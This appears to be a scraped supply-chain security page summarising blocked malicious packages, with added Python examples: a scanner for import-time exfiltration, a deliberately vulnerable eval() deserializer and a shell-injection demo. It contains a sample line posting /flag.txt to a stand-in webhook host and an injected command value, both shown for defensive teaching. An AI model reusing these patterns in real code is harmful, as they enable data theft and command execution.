Secure your dependencies. Ship with confidence.

Socket is a developer-first security platform that protects your code from both vulnerable and malicious dependencies.

Find and compare millions of open source packages

Quickly evaluate the security and health of any open source package.

jquery: timmywil published 4.0.0
left-pad: stevemao published 1.3.0
react: react-bot published 19.2.4

We protect you from vulnerable and malicious packages

atlasctf-21-prod-08 99.99.99 · Removed from pypi · Blocked by Socket

This module implements direct, unauthorized data exfiltration: it reads a likely sensitive file (/flag.txt) and posts its contents to a hard-coded external webhook along with a package identifier. It executes on import, suppresses errors to avoid detection, and provides no legitimate justification for this behavior. Treat the code as malicious/backdoor; do not run or deploy it. Remove the file from the codebase, investigate the package origin, and rotate any exposed secrets.

Live on pypi for 5 hours and 19 minutes before removal. Socket users were protected even while the package was live.
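The behaviour described for this package (a module-level read of a sensitive path, a POST to a hard-coded URL, and an except clause that swallows every error) is a pattern a static pass can pick out before the package is ever imported. The following is an added example, not Socket's scanner and not the package's own code: it walks module scope only, because that is what runs on `import`, and is exercised here against a constructed sample that mimics the described behaviour and a benign module for comparison. The sink list, the path hints and both sample modules are assumptions made for the demo.

```python
"""Added example: flag code that runs at import time and touches sensitive files or the network.
Not Socket's scanner; module scope only, because that is what executes on `import`."""
import ast
from typing import List, NamedTuple

# Assumed sink lists for the demo; a real scanner would also resolve aliases and `from x import y`.
NETWORK_SINKS = {
    "requests.post", "requests.get", "requests.put",
    "urllib.request.urlopen", "http.client.HTTPSConnection", "socket.socket",
}
SENSITIVE_PATH_HINTS = ("/flag", "/etc/passwd", "/etc/shadow", ".ssh/", ".aws/", ".npmrc", "auth.json")


class Finding(NamedTuple):
    kind: str
    lineno: int
    detail: str


def _dotted_name(func: ast.expr) -> str:
    """Return 'requests.post' for the callee of `requests.post(...)`, '' if not a plain name chain."""
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
        return ".".join(reversed(parts))
    return ""


def _first_str_arg(call: ast.Call) -> str:
    if call.args and isinstance(call.args[0], ast.Constant) and isinstance(call.args[0].value, str):
        return call.args[0].value
    return ""


def scan_import_time(source: str) -> List[Finding]:
    findings: List[Finding] = []
    for stmt in ast.parse(source).body:
        # Function and class bodies only run when called; skip them, we want import-time behaviour.
        if isinstance(stmt, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef)):
            continue
        if isinstance(stmt, ast.Try):
            for handler in stmt.handlers:
                if all(isinstance(b, ast.Pass) for b in handler.body):
                    findings.append(Finding("errors_suppressed", handler.lineno,
                                            "except body is only `pass`"))
        for node in ast.walk(stmt):
            if not isinstance(node, ast.Call):
                continue
            name = _dotted_name(node.func)
            arg = _first_str_arg(node)
            if name in NETWORK_SINKS:
                findings.append(Finding("network_at_import", node.lineno, f"{name}({arg!r})"))
            elif name in ("open", "pathlib.Path", "Path") and any(h in arg for h in SENSITIVE_PATH_HINTS):
                findings.append(Finding("sensitive_file_read", node.lineno, arg))
    return findings


# Constructed sample modules (not real package code): one mimics the described behaviour, one is benign.
EXFIL_SAMPLE = '''
import requests
try:
    payload = open("/flag.txt").read()
    requests.post("https://webhook.example.invalid/collect", json={"pkg": "demo", "data": payload})
except Exception:
    pass
'''

BENIGN_SAMPLE = '''
import requests

def fetch(url, timeout=5):
    return requests.get(url, timeout=timeout).text
'''

if __name__ == "__main__":
    for f in scan_import_time(EXFIL_SAMPLE):
        print(f"line {f.lineno}: {f.kind}: {f.detail}")
    print("benign:", scan_import_time(BENIGN_SAMPLE))
```

The benign module makes the same `requests` call but inside a function, so it produces no finding; the point of restricting the walk to module scope is that a call at import time needs no cooperation from the consuming application to run.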

mtmai 0.3.862 · Live on pypi · Blocked by Socket

This module is an automation/scraping worker that intentionally executes code provided by task descriptions. That design requires trusting the task source. The code contains multiple high-risk sinks: subprocess with shell=True, exec()/eval of task-supplied code, and browser JS execution. It also copies browser user profiles (cookies/credentials) into temporary profiles, which increases risk of credential theft. If task inputs are untrusted (remote server controlled by attacker or tampered local JSON), an attacker can achieve remote code execution, data exfiltration (files, cookies), or arbitrary system changes. Recommendation: only run with tasks from trusted sources, disable remote task fetching unless secured, avoid copying full user-data profiles, and remove/guard exec/eval/subprocess paths or run worker inside a hardened sandbox/container with least privileges.

sbcli-main 1.0.8 · Live on pypi · Blocked by Socket

This module implements privileged node and device management and exposes HTTP endpoints that accept user input used directly in shell commands and Docker operations. Main risks: command injection (unsanitized string interpolation into shell commands and os.popen), destructive device operations (partitioning, bind/unbind), supplying arbitrary images to be pulled and run as privileged containers, and use of an unencrypted/unprotected Docker TCP socket (tcp://...:2375). I assess this as not manifestly malware but a high-risk administrative component that must be strictly access-controlled and hardened (validate/sanitize inputs, avoid passing raw user values into shell/Docker operations, use secure Docker API access, avoid exposing endpoints publicly).

johnsnowlabs-for-databricks-by-ckl 5.1.0rc5 · Live on pypi · Blocked by Socket

This module is a high-risk utility because it fetches Python code from remote URLs and local markdown files and executes that code directly via execute_py_script_string_as_new_proc without validation or sandboxing. The code itself does not contain obvious obfuscation or hardcoded credentials, but it provides an execution surface that enables remote code execution and potential data exfiltration or system compromise depending on the executed snippets and the implementation of execute_py_script_string_as_new_proc. Treat calls that use remote URLs or untrusted markdown as dangerous. Use only with trusted content or add validation/sandboxing (e.g., static analysis of snippets, running in containers with restricted privileges, allowlists, checksums/signatures).

nearc 0.10.0 · Live on pypi · Blocked by Socket

This module is functionally a minimal serializer that reconstructs objects by evaluating repr()-based strings. It contains an immediate and severe security flaw: loads() decodes external input and feeds it to eval(), and it may import modules based on the serialized text before evaluation. While not explicitly malicious, the code enables arbitrary code execution and import-time side effects when deserializing untrusted data. Treat this as high risk — avoid using it on untrusted inputs and refactor to safer serialization patterns.
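An added example, not nearc's code, that models the pattern described above beside the safer alternative the assessment asks for. `loads_unsafe` imports every module name it sees in the text and then eval()s it, so a string that is not data at all becomes an import plus a function call. `loads_safe` accepts only Python literals through `ast.literal_eval` and rebuilds objects from a tagged dict via an explicit allowlist of registered classes, so an unknown type name is refused instead of looked up. The module-name regex, the `__type__` tag and the `Point` class are assumptions made for the demo.

```python
"""Added example: repr()/eval() round-trip deserializer beside a literal-only, allowlisted one.
Modelled on the pattern described above; not nearc's actual code."""
import ast
import importlib
import re
from typing import Any, Dict, Type

# Assumption for the demo: the unsafe loader imports any `name.` prefix it sees so the eval resolves.
_MODULE_PREFIX = re.compile(r"\b([A-Za-z_]\w*)\.(?=[A-Za-z_])")


def loads_unsafe(text: str) -> Any:
    """Deliberately vulnerable: import-time side effects, then arbitrary code execution."""
    namespace: Dict[str, Any] = {"__builtins__": __builtins__}
    for mod in set(_MODULE_PREFIX.findall(text)):
        try:
            namespace[mod] = importlib.import_module(mod)
        except ImportError:
            pass
    return eval(text, namespace)  # noqa: S307  (the bug under discussion)


# --- hardened version: literals only, objects rebuilt through an allowlist ----------------
_REGISTRY: Dict[str, Type] = {}
_TAG = "__type__"  # assumed tag name for the demo


def register(cls: Type) -> Type:
    """Only classes registered here can ever be rebuilt from untrusted input."""
    _REGISTRY[cls.__name__] = cls
    return cls


def _to_literal(obj: Any) -> Any:
    """Reduce a value to literals only; registered objects become a tagged dict of their fields."""
    if type(obj).__name__ in _REGISTRY:
        return {_TAG: type(obj).__name__, **{k: _to_literal(v) for k, v in vars(obj).items()}}
    if isinstance(obj, list):
        return [_to_literal(v) for v in obj]
    if isinstance(obj, tuple):
        return tuple(_to_literal(v) for v in obj)
    if isinstance(obj, dict):
        return {k: _to_literal(v) for k, v in obj.items()}
    if isinstance(obj, (str, bytes, int, float, bool, type(None))):
        return obj
    raise TypeError(f"unsupported type: {type(obj).__name__}")


def _from_literal(data: Any) -> Any:
    if isinstance(data, dict) and _TAG in data:
        cls = _REGISTRY.get(data[_TAG])
        if cls is None or not all(isinstance(k, str) for k in data):
            raise ValueError(f"refusing to rebuild unregistered or malformed type {data[_TAG]!r}")
        return cls(**{k: _from_literal(v) for k, v in data.items() if k != _TAG})
    if isinstance(data, list):
        return [_from_literal(v) for v in data]
    if isinstance(data, tuple):
        return tuple(_from_literal(v) for v in data)
    if isinstance(data, dict):
        return {k: _from_literal(v) for k, v in data.items()}
    return data


def dumps(obj: Any) -> str:
    return repr(_to_literal(obj))


def loads_safe(text: str) -> Any:
    """literal_eval raises on any name lookup, attribute access or call, so no code can run."""
    try:
        data = ast.literal_eval(text)
    except (ValueError, SyntaxError, TypeError, MemoryError, RecursionError) as exc:
        raise ValueError(f"refusing to deserialize non-literal payload: {text[:40]!r}") from exc
    return _from_literal(data)


def is_rejected(text: str) -> bool:
    try:
        loads_safe(text)
    except ValueError:
        return True
    return False


@register
class Point:
    def __init__(self, x: int, y: int) -> None:
        self.x, self.y = x, y

    def __eq__(self, other: object) -> bool:
        return isinstance(other, Point) and (self.x, self.y) == (other.x, other.y)

    def __repr__(self) -> str:
        return f"Point(x={self.x}, y={self.y})"


if __name__ == "__main__":
    print(loads_unsafe("math.factorial(5)"))          # a "serialized value" that is really a call
    print(loads_safe(dumps({"pts": [Point(1, 2)]})))  # round trip through literals only
    print(is_rejected("math.factorial(5)"))          # same payload, refused
```

`ast.literal_eval` still parses attacker-controlled text, so deeply nested input can exhaust the recursion limit; the `RecursionError` catch above turns that into a rejection rather than a crash, and a length cap before parsing is the usual complement.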

snow-flow 8.37.8 · Live on npm · Blocked by Socket

This code is an administrative automation component that deliberately executes arbitrary ServiceNow server-side scripts and manipulates system tables. I found no clear signs of intentionally malicious code (no hardcoded external exfiltration endpoints, no obfuscated payload). However, it exposes powerful sinks: arbitrary script execution, creation of background script records, and storage of script output/trace in sys_properties. The primary security risk is abuse/misconfiguration (e.g., autoConfirm bypass, insufficient RBAC) leading to data theft or destructive changes. Treat this module as high-risk functionality that must be strictly access controlled, audited, and hardened before use.

@ao-x/ai-text 0.0.1 by mengwenbohh · Live on npm · Blocked by Socket

This file retrieves and executes scripts from 149[.]88[.]81[.]211, installs ngrok with a hardcoded token, and launches a Jupyter Lab server configured for open access. The use of persistent background processes, elevated privileges via sudo, and unvalidated remote downloads pose significant risks, enabling unauthorized remote access or data exfiltration.

sbcli-mig 1.0.434 · Live on pypi · Blocked by Socket

The Python module itself is not directly implementing typical malware behaviors, but it creates a high-risk execution surface: it runs local shell scripts (some with sudo) with unvalidated inputs and passes secrets on the command line. The deploy_fdb_from_file_service function contains a command-injection vulnerability (shell=True with joined args) and a coding bug (returncod typo). Recommend: remove shell=True and always use argument lists; avoid passing secrets via argv (use stdin, environment files with proper filesystem permissions, or secured IPC); eliminate unnecessary sudo calls and require callers to provide appropriate privileges if needed; validate/escape inputs (especially file paths); fix the returncod typo; and audit all invoked shell scripts before use. Treat the package as risky until mitigations and script audits are performed.
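An added example, not sbcli-mig's code, that isolates the two defects named above using a constructed stand-in for the deploy script. `deploy_vulnerable` joins its arguments into one string and hands it to the shell with the password on argv, so a device name containing `;` starts a second command and the secret is visible to any local user via `ps`. `deploy_hardened` passes an argument list (no shell parsing, so the same device name reaches the script as one argument), feeds the password over stdin, and checks `returncode`, the attribute the assessment says was misspelled. The script bodies, the device name and the `INJECTED` marker are constructed for the demo; it needs a POSIX `sh`.

```python
"""Added example: shell=True with joined argv (injectable, secret visible in `ps`) beside an
argument-list call with the secret on stdin. Stand-in scripts are constructed for the demo."""
import os
import subprocess
import tempfile

# Constructed stand-in for a vendored deploy script that takes device and password on argv.
ARGV_SCRIPT = '#!/bin/sh\necho "device=$1 password_len=${#2}"\n'
# Constructed hardened stand-in: the password is read from stdin, so it never appears in argv.
STDIN_SCRIPT = '#!/bin/sh\nread -r pw\necho "device=$1 password_len=${#pw}"\n'


def write_script(body: str) -> str:
    fd, path = tempfile.mkstemp(suffix=".sh")
    with os.fdopen(fd, "w") as fh:
        fh.write(body)
    return path


def deploy_vulnerable(script: str, device: str, password: str) -> str:
    """The bug pattern: arguments joined into one string and parsed by /bin/sh.
    A device name such as 'disk0; echo INJECTED' ends the command and starts another;
    the password also sits on the command line, readable by any local user via `ps`."""
    cmd = " ".join(["sh", script, device, password])
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    if result.returncode != 0:
        raise RuntimeError(result.stderr)
    return result.stdout


def deploy_hardened(script: str, device: str, password: str) -> str:
    """Argument list: each element reaches the script as exactly one argv entry, so shell
    metacharacters in `device` are inert. The secret travels over stdin, not argv."""
    result = subprocess.run(
        ["sh", script, device],
        input=password + "\n",
        capture_output=True,
        text=True,
        check=False,
    )
    if result.returncode != 0:  # `returncode`, not the misspelled attribute the assessment mentions
        raise RuntimeError(result.stderr)
    return result.stdout


def demo(device: str = "disk0; echo INJECTED", password: str = "hunter2") -> dict:
    """Run both variants on the same inputs and return their stdout for comparison."""
    vuln_script, safe_script = write_script(ARGV_SCRIPT), write_script(STDIN_SCRIPT)
    try:
        return {
            "vulnerable": deploy_vulnerable(vuln_script, device, password),
            "hardened": deploy_hardened(safe_script, device, password),
        }
    finally:
        os.unlink(vuln_script)
        os.unlink(safe_script)


if __name__ == "__main__":
    for name, out in demo().items():
        print(f"{name}:\n{out}")
```

In the vulnerable run the script receives only `disk0` and an empty password (the `;` ended its command line), and the injected `echo` even prints the password that was meant for it; in the hardened run the whole device string arrives as `$1` and the seven-character password arrives on stdin.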

isite 1.14.76 by absunstar · Live on npm · Blocked by Socket

This code implements a sophisticated remote access backdoor that accepts and executes arbitrary JavaScript code from remote WebSocket connections. The combination of heavy obfuscation, remote code execution vulnerability, and persistent reconnection establishes unauthorized system access, confirming its nature as malware.

azure-graphrbac 2.2.6 · Removed from npm · Blocked by Socket

Possible typosquat of [azure](https://socket.dev/npm/package/azure). Explanation: The package 'azure-graphrbac' is labeled as a 'security holding package', which often indicates a placeholder to prevent typosquatting. The name 'azure-graphrbac' closely resembles 'azure' and could be misleading. The maintainers list includes 'npm', which is not a specific known maintainer. The description does not provide enough information to determine a distinct purpose, and the similarity in naming suggests it could be a typosquat. azure-graphrbac is a security-holding package.

Live on npm for 3 hours and 49 minutes before removal. Socket users were protected even while the package was live.

imagecomponents.win32.imaging 4.0.0.7 by Image Components · Live on nuget · Blocked by Socket

This assembly contains heavy obfuscation and an embedded loader/unpacker that decrypts resources and performs runtime integrity checks, then uses native API calls to allocate memory and write into other processes. The presence of VirtualAlloc/OpenProcess/WriteProcessMemory/VirtualProtect combined with decryption of bundled data and dynamic delegate creation indicates code injection capability and an active unpacker. Even though the assembly also exposes UI controls, the loader component is malicious or potentially weaponizable (process injection/backdoor). Do not trust or use this package in production; it should be treated as malicious and removed from the supply chain.

imagecomponents.mvc.imaging 4.0.4.3 by Image Components · Live on nuget · Blocked by Socket

This assembly contains an obfuscated payload loader/unpacker. It reads embedded resources or files, verifies signatures, decrypts data with a hard-coded AES key/IV, then allocates and writes executable memory and constructs runtime delegates and dynamic methods to execute the unpacked payload. It also enumerates processes/modules and uses kernel32 APIs (VirtualAlloc/WriteProcessMemory/VirtualProtect/OpenProcess) — behavior consistent with code injection or an in-memory loader/backdoor. Given the divergence between the public-facing API names and the contained low-level behaviors, treat this package as malicious/untrusted and remove it from sensitive environments.

azure-graphrbac 6.8.5 · Removed from npm · Blocked by Socket

The code is clearly designed to exfiltrate system information and file contents to external servers, indicating malicious intent. The presence of an infinite loop for data collection further exacerbates the security risk.

Live on npm for 14 minutes before removal. Socket users were protected even while the package was live.

354766/grahama1970/agent-skills/agent-inbox/ 5154a81f2ccf38e4896f4cd97bffdfcb065d987d · Live on socket · Blocked by Socket

This module implements a credential- and data-exfiltration pattern: it reads a local OpenAI-like token and user prompt and sends both to a non-official, lookalike endpoint (chatgpt.com/...). The request headers and payload mimic official OpenAI traffic, increasing the likelihood this is designed to harvest usable credentials. There is no obfuscation and no destructive payload, but transmitting long-lived tokens and account identifiers to an untrusted domain is a high-risk malicious behavior. Recommendation: Do not run this code where you store real credentials; treat tokens in ~/.pi/agent/auth.json as compromised if this script was present. Replace with official API calls or verify remote endpoint ownership before use.

354766/metalbear-co/skills/mirrord-config/ 7969aa67ac9b1728f24c371848fc9cc71fa59e23 · Live on socket · Blocked by Socket

[Skill Scanner] Pipe-to-shell or eval pattern detected. All findings:
[CRITICAL] command_injection: Pipe-to-shell or eval pattern detected (CI013) [AITech 9.1.4]
[CRITICAL] command_injection: URL pointing to executable file detected (CI010) [AITech 9.1.4]
[CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4]
[HIGH] command_injection: Reference to external script with install/setup context (SC005)
The skill is conceptually benign and its capabilities align with its stated purpose (generate/validate/fix mirrord.json using packaged schema + the mirrord CLI). The primary security concern is the instruction to install mirrord via curl | bash (raw GitHub script execution) and the implicit trust placed in the external mirrord binary run during validation. Those steps create a supply-chain risk (remote code execution and potential network telemetry/exfiltration by the external installer/CLI) and should be treated with caution: prefer package manager installs with verified provenance, or require explicit manual review of installer scripts and provide hash/signature checks. No direct evidence of malware or obfuscation exists in the skill content itself. LLM verification: The mirrord-config skill is effectively aligned with its primary purpose of generating and validating configurations. However, it exhibits high-risk installation guidance (curl | bash and external installers) that introduces significant supply-chain and host-security risks. To improve security posture, replace or supplement remote-install steps with verifiable, signed artifacts via official package managers or pre-vetted binaries, add checksum/signature validation, and clearly separate tool inst

react-native-latest 200.0.0 by lykos_poc1 · Removed from npm · Blocked by Socket

This script is potentially malicious as it is sending sensitive system information to a remote server without the user's consent. It could be used for data exfiltration or other malicious purposes.

Live on npm for 24 minutes before removal. Socket users were protected even while the package was live.

fray 3.5.105 · Live on pypi · Blocked by Socket

This file is a concentrated collection of active exploit/deserialization payloads designed to detect or trigger known gadget chains and vulnerabilities across multiple platforms. While formatted as a testing catalog, its content is inherently dangerous: it includes explicit command-execution payloads, remote class-loading references, and authentication-bypass tokens. If found in a codebase or dependency, treat as high-risk—remove from production, restrict access, audit any use or transmission logs, and verify no unauthorized target interactions occurred. Only use in controlled, authorized testing environments.

sphinx 1.4.2 · Live on pypi · Blocked by Socket

This HTML file contains clear malicious content with repeated attempts to load unknown JavaScript from the local file system. The file:// protocol usage combined with the suspicious filename and excessive repetition indicates a high-risk security threat that could lead to local system compromise.

kejie.bos 2.0.10 by Kejiesoft · Live on nuget · Blocked by Socket

This file mixes legitimate helper types (JSON converters, cache managers, Redis, Wx settings, QR code utilities) with a large, highly obfuscated loader/unpacker that reads encrypted resources, performs decryption, manipulates process memory, P/Invokes native APIs (VirtualAlloc/mprotect/WriteProcessMemory/OpenProcess/etc.), dynamically generates delegates/methods, and executes code in memory. Those capabilities (resource decryption -> write into executable memory -> change protections -> invoke) are typical of packers, runtime unpackers, or implant loaders and are high-risk in a dependency. I consider this behavior malicious or at least extremely risky for supply-chain use: the module can execute code not visible in source, perform process memory operations, detect tampering, and load native/jitted payloads. Recommend removing or sandboxing and performing full binary/behavioral analysis before use.

354766/1nfsh-s1/skills/agent-browser/ 20d09c09eb2aa281ee179f741d5e9ae585a27441 · Live on socket · Blocked by Socket

[Skill Scanner] Pipe-to-shell or eval pattern detected. All findings:
[CRITICAL] command_injection: Pipe-to-shell or eval pattern detected (CI013) [AITech 9.1.4]
[CRITICAL] command_injection: Natural language instruction to download and install from URL detected (CI009) [AITech 9.1.4] (reported twice)
[CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] (reported repeatedly; the scanner listed this finding about thirty times)
This skill is functionally coherent with its stated purpose (hosted browser automation via inference.sh) and contains expected high-risk capabilities for such a tool: arbitrary JavaScript execution, file uploads, proxy configuration, and routing through a hosted backend. There is no direct evidence in the provided document of hidden malicious code or obfuscation. However, the design requires high trust in the inference.sh distribution and backend because sensitive data (page DOM, cookies, uploaded local files, videos/screenshots, user credentials) will transit through that service. The most likely abuse scenarios are credential/data harvesting via a malicious proxy or compromise of the inference.sh backend or CLI binary. I rate this as suspicious/high-risk in a supply-chain sense (not evidently malicious in the file itself) and recommend careful review of the inference.sh binaries, hosting operator trust, and limiting use of proxy/execute/file-upload features when handling sensitive data. LLM verification: The agent-browser skill's documented capabilities match legitimate Playwright-based browser automation tools, but multiple high-risk design and supply-chain elements are present: a pipe-to-shell installer pattern, reliance on external distribution domains, remote execution via inference.sh infrastructure, arbitrary JS execution in page context, local-file upload capability, and proxy credential handling. These create significant opportunities for sensitive-data exposure or misuse if the inferenc

cl-lite 1.0.1236 by michael_tian · Live on npm · Blocked by Socket

The source code contains embedded inappropriate adult content with numerous external image links. It is not valid or functional software code. No explicit malware or direct security vulnerabilities are detected, but the presence of inappropriate content and the corrupted format poses a significant security and content risk. This package should be rejected or quarantined due to high risk and inappropriate content.

workspace-loader 1.0.0 by fakemgz · Live on npm · Blocked by Socket

The code is designed to collect and exfiltrate rich host information to a Telegram bot without user consent, using embedded credentials and silent operation. This constitutes data exfiltration with backdoor-like traits and represents a high security risk. Hardcoded credentials enable uncontrolled data leakage, and access to sensitive files (e.g., /etc/passwd) and environment variables worsens the risk. Remove hardcoded credentials, implement explicit user consent, limit data collection, and avoid automatic exfiltration from dependencies.

@energysolutions/mylib 99999999.999999.999999 by zoeovpz · Live on npm · Blocked by Socket

The code exhibits behaviors typical of malware, such as unauthorized data collection and transmission to an external server. The use of a Discord webhook for data exfiltration is particularly concerning. The provided reports are placeholders and do not offer any analysis, necessitating a reevaluation based on the code's behavior.

github.com/milvus-io/milvus v0.10.3-0.20211206104757-51c0c0b87c6f · Live on go · Blocked by Socket

This code implements an insecure, unauthenticated RPC mechanism that allows remote clients to cause arbitrary code execution and exfiltrate files/system information. Using pickle over an untrusted network and invoking methods by client-supplied names are severe supply-chain/backdoor risks. Do not deploy or reuse this code in production; it should be treated as a backdoor/untrusted remote-execution component unless wrapped with strong authentication, authorization, sandboxing, and safe serialization.

atlasctf-21-prod-08

99.99.99

Removed from pypi

Blocked by Socket

This module implements direct, unauthorized data exfiltration: it reads a likely sensitive file (/flag.txt) and posts its contents to a hard-coded external webhook along with a package identifier. It executes on import, suppresses errors to avoid detection, and provides no legitimate justification for this behavior. Treat the code as malicious/backdoor; do not run or deploy it. Remove the file from the codebase, investigate the package origin, and rotate any exposed secrets.

Live on pypi for 5 hours and 19 minutes before removal. Socket users were protected even while the package was live.

mtmai

0.3.862

Live on pypi

Blocked by Socket

This module is an automation/scraping worker that intentionally executes code provided by task descriptions. That design requires trusting the task source. The code contains multiple high-risk sinks: subprocess with shell=True, exec()/eval of task-supplied code, and browser JS execution. It also copies browser user profiles (cookies/credentials) into temporary profiles, which increases risk of credential theft. If task inputs are untrusted (remote server controlled by attacker or tampered local JSON), an attacker can achieve remote code execution, data exfiltration (files, cookies), or arbitrary system changes. Recommendation: only run with tasks from trusted sources, disable remote task fetching unless secured, avoid copying full user-data profiles, and remove/guard exec/eval/subprocess paths or run worker inside a hardened sandbox/container with least privileges.

sbcli-main

1.0.8

Live on pypi

Blocked by Socket

This module implements privileged node and device management and exposes HTTP endpoints that accept user input used directly in shell commands and Docker operations. Main risks: command injection (unsanitized string interpolation into shell commands and os.popen), destructive device operations (partitioning, bind/unbind), supplying arbitrary images to be pulled and run as privileged containers, and use of an unencrypted/unprotected Docker TCP socket (tcp://...:2375). I assess this as not manifestly malware but a high-risk administrative component that must be strictly access-controlled and hardened (validate/sanitize inputs, avoid passing raw user values into shell/Docker operations, use secure Docker API access, avoid exposing endpoints publicly).

johnsnowlabs-for-databricks-by-ckl

5.1.0rc5

Live on pypi

Blocked by Socket

This module is a high-risk utility because it fetches Python code from remote URLs and local markdown files and executes that code directly via execute_py_script_string_as_new_proc without validation or sandboxing. The code itself does not contain obvious obfuscation or hardcoded credentials, but it provides an execution surface that enables remote code execution and potential data exfiltration or system compromise depending on the executed snippets and the implementation of execute_py_script_string_as_new_proc. Treat calls that use remote URLs or untrusted markdown as dangerous. Use only with trusted content or add validation/sandboxing (e.g., static analysis of snippets, running in containers with restricted privileges, allowlists, checksums/signatures).

nearc

0.10.0

Live on pypi

Blocked by Socket

This module is functionally a minimal serializer that reconstructs objects by evaluating repr()-based strings. It contains an immediate and severe security flaw: loads() decodes external input and feeds it to eval(), and it may import modules based on the serialized text before evaluation. While not explicitly malicious, the code enables arbitrary code execution and import-time side effects when deserializing untrusted data. Treat this as high risk — avoid using it on untrusted inputs and refactor to safer serialization patterns.

snow-flow

8.37.8

Live on npm

Blocked by Socket

This code is an administrative automation component that deliberately executes arbitrary ServiceNow server-side scripts and manipulates system tables. I found no clear signs of intentionally malicious code (no hardcoded external exfiltration endpoints, no obfuscated payload). However, it exposes powerful sinks: arbitrary script execution, creation of background script records, and storage of script output/trace in sys_properties. The primary security risk is abuse/misconfiguration (e.g., autoConfirm bypass, insufficient RBAC) leading to data theft or destructive changes. Treat this module as high-risk functionality that must be strictly access controlled, audited, and hardened before use.

@ao-x/ai-text

0.0.1

by mengwenbohh

Live on npm

Blocked by Socket

This file retrieves and executes scripts from 149[.]88[.]81[.]211, installs ngrok with a hardcoded token, and launches a Jupyter Lab server configured for open access. The use of persistent background processes, elevated privileges via sudo, and unvalidated remote downloads pose significant risks, enabling unauthorized remote access or data exfiltration.

sbcli-mig

1.0.434

Live on pypi

Blocked by Socket

The Python module itself is not directly implementing typical malware behaviors, but it creates a high-risk execution surface: it runs local shell scripts (some with sudo) with unvalidated inputs and passes secrets on the command line. The deploy_fdb_from_file_service function contains a command-injection vulnerability (shell=True with joined args) and a coding bug (returncod typo). Recommend: remove shell=True; use argument lists always, avoid passing secrets via argv (use stdin, environment files with proper filesystem permissions, or secured IPC), eliminate unnecessary sudo calls and require callers to provide appropriate privileges if needed, validate/escape inputs (especially file paths), fix the returncod typo, and audit all invoked shell scripts before use. Treat package as risky until mitigations and script audits are performed.

isite

1.14.76

by absunstar

Live on npm

Blocked by Socket

This code implements a sophisticated remote access backdoor that accepts and executes arbitrary JavaScript code from remote WebSocket connections. The combination of heavy obfuscation, remote code execution vulnerability, and persistent reconnection establishes unauthorized system access, confirming its nature as malware.

azure-graphrbac

2.2.6

Removed from npm

Blocked by Socket

Possible typosquat of [azure](https://socket.dev/npm/package/azure) Explanation: The package 'azure-graphrbac' is labeled as a 'security holding package', which often indicates a placeholder to prevent typosquatting. The name 'azure-graphrbac' closely resembles 'azure' and could be misleading. The maintainers list includes 'npm', which is not a specific known maintainer. The description does not provide enough information to determine a distinct purpose, and the similarity in naming suggests it could be a typosquat. azure-graphrbac is a security-holding package

Live on npm for 3 hours and 49 minutes before removal. Socket users were protected even while the package was live.

imagecomponents.win32.imaging

4.0.0.7

by Image Components

Live on nuget

Blocked by Socket

This assembly contains heavy obfuscation and an embedded loader/unpacker that decrypts resources and performs runtime integrity checks, then uses native API calls to allocate memory and write into other processes. The presence of VirtualAlloc/OpenProcess/WriteProcessMemory/VirtualProtect combined with decryption of bundled data and dynamic delegate creation indicates code injection capability and an active unpacker. Even though the assembly also exposes UI controls, the loader component is malicious or potentially weaponizable (process injection/backdoor). Do not trust or use this package in production; it should be treated as malicious and removed from the supply chain.

imagecomponents.mvc.imaging

4.0.4.3

by Image Components

Live on nuget

Blocked by Socket

This assembly contains an obfuscated payload loader/unpacker. It reads embedded resources or files, verifies signatures, decrypts data with a hard-coded AES key/IV, then allocates and writes executable memory and constructs runtime delegates and dynamic methods to execute the unpacked payload. It also enumerates processes/modules and uses kernel32 APIs (VirtualAlloc/WriteProcessMemory/VirtualProtect/OpenProcess) — behavior consistent with code injection or an in-memory loader/backdoor. Given the divergence between the public-facing API names and the contained low-level behaviors, treat this package as malicious/untrusted and remove it from sensitive environments.

azure-graphrbac

6.8.5

Removed from npm

Blocked by Socket

The code is clearly designed to exfiltrate system information and file contents to external servers, indicating malicious intent. The presence of an infinite loop for data collection further exacerbates the security risk.

Live on npm for 14 minutes before removal. Socket users were protected even while the package was live.

354766/grahama1970/agent-skills/agent-inbox/

5154a81f2ccf38e4896f4cd97bffdfcb065d987d

Live on socket

Blocked by Socket

This module implements a credential- and data-exfiltration pattern: it reads a local OpenAI-like token and user prompt and sends both to a non-official, lookalike endpoint (chatgpt.com/...). The request headers and payload mimic official OpenAI traffic, increasing the likelihood this is designed to harvest usable credentials. There is no obfuscation and no destructive payload, but transmitting long-lived tokens and account identifiers to an untrusted domain is a high-risk malicious behavior. Recommendation: Do not run this code where you store real credentials; treat tokens in ~/.pi/agent/auth.json as compromised if this script was present. Replace with official API calls or verify remote endpoint ownership before use.

354766/metalbear-co/skills/mirrord-config/

7969aa67ac9b1728f24c371848fc9cc71fa59e23

Live on socket

Blocked by Socket

[Skill Scanner] Pipe-to-shell or eval pattern detected

All findings:
[CRITICAL] command_injection: Pipe-to-shell or eval pattern detected (CI013) [AITech 9.1.4]
[CRITICAL] command_injection: URL pointing to executable file detected (CI010) [AITech 9.1.4]
[CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4]
[HIGH] command_injection: Reference to external script with install/setup context (SC005)

The skill is conceptually benign and its capabilities align with its stated purpose (generate/validate/fix mirrord.json using packaged schema + the mirrord CLI). The primary security concern is the instruction to install mirrord via curl | bash (raw GitHub script execution) and the implicit trust placed in the external mirrord binary run during validation. Those steps create a supply-chain risk (remote code execution and potential network telemetry/exfiltration by the external installer/CLI) and should be treated with caution: prefer package manager installs with verified provenance, or require explicit manual review of installer scripts and provide hash/signature checks. No direct evidence of malware or obfuscation exists in the skill content itself.

LLM verification: The mirrord-config skill is effectively aligned with its primary purpose of generating and validating configurations. However, it exhibits high-risk installation guidance (curl | bash and external installers) that introduces significant supply-chain and host-security risks. To improve security posture, replace or supplement remote-install steps with verifiable, signed artifacts via official package managers or pre-vetted binaries, add checksum/signature validation, and clearly separate tool inst

react-native-latest

200.0.0

by lykos_poc1

Removed from npm

Blocked by Socket

This script is potentially malicious as it is sending sensitive system information to a remote server without the user's consent. It could be used for data exfiltration or other malicious purposes.

Live on npm for 24 minutes before removal. Socket users were protected even while the package was live.

fray

